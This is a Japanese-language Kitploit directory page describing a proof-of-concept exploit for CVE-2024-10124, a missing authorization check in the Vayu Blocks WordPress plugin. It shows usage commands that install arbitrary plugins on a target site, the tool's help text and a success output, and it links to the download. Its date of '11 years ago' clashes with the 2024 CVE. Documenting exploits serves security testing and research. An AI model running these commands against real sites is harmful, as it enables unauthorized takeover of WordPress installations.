Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-10124-Poc — CVE-2024-10124のWordPress Vayu Blocksプラグイン用の概念実証エクスプロイト。不正なプラグインのインストールと有効化を可能にし、リモートコード実行を達成する可能性があります。 | Kitploit
ツール/GitHubGitHub/nxploited/cve-2024-10124-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト学習と教育
GitHubnxploited/cve-2024-10124-poc

CVE-2024-10124-Poc

CVE-2024-10124のWordPress Vayu Blocksプラグイン用の概念実証エクスプロイト。不正なプラグインのインストールと有効化を可能にし、リモートコード実行を達成する可能性があります。

リポジトリを見る
11年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-10124-Poc

「Vayu Blocks – Gutenberg Blocks for WordPress & WooCommerce」WordPress プラグインは、バージョン 1.1.1 までの全バージョンにおいて、tp_install() 関数の権限チェックが欠如しているため、未認証の攻撃者が任意のプラグインをインストールおよび有効化できる脆弱性があります。これにより、別の脆弱なプラグインがインストールされ有効化されている場合、リモートコード実行を達成するために悪用される可能性があります。この脆弱性はバージョン 1.1.1 で部分的に修正されました。

シナリオ例

脆弱性の確認

root@kitploit:~
python CVE-2024-10124.py -u http://192.168.100.74/wordpress --check-version

これにより、vayu-blocks プラグインのバージョンを確認し、サイトが脆弱かどうかを判定します。

プラグインのインストール(デフォルト)

root@kitploit:~
python CVE-2024-10124.py -u http://192.168.100.74/wordpress

これにより、デフォルトのプラグイン hello-dolly がインストールされます。

特定のプラグインのインストール

root@kitploit:~
python CVE-2024-10124.py -u http://192.168.100.74/wordpress -p plugin_name

これにより、対象サイトに plugin_name プラグインがインストールされます。

🔍コマンド説明例
🌐-u or --urlWordPress サイトのターゲット URL を指定します。-u http://192.168.100.74/wordpress
🔒--check-versionバージョンに基づいてサイトが脆弱かどうかを確認します。-u http://192.168.100.74/wordpress --check-version
⚙️-p or --pluginプラグイン名を指定します(デフォルトは hello-dolly)。-u http://192.168.100.74/wordpress -p plugin_name
root@kitploit:~
options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target URL (e.g., http://192.168.100.74/wordpress)
  -p PLUGIN, --plugin PLUGIN
                        Plugin name (default: hello-dolly)
  --check-version       Check if the site is vulnerable based on plugin version

出力

root@kitploit:~
Response Status Code: 200
The plugin has been successfully uploaded and activated.
Response Content: "http:\/\/192.168.100.74\/wordpress"

注意:

このスクリプトは教育目的のみで提供されています。作者は、このスクリプトの誤用によって引き起こされたいかなる損害についても責任を負いません。

ツールをダウンロード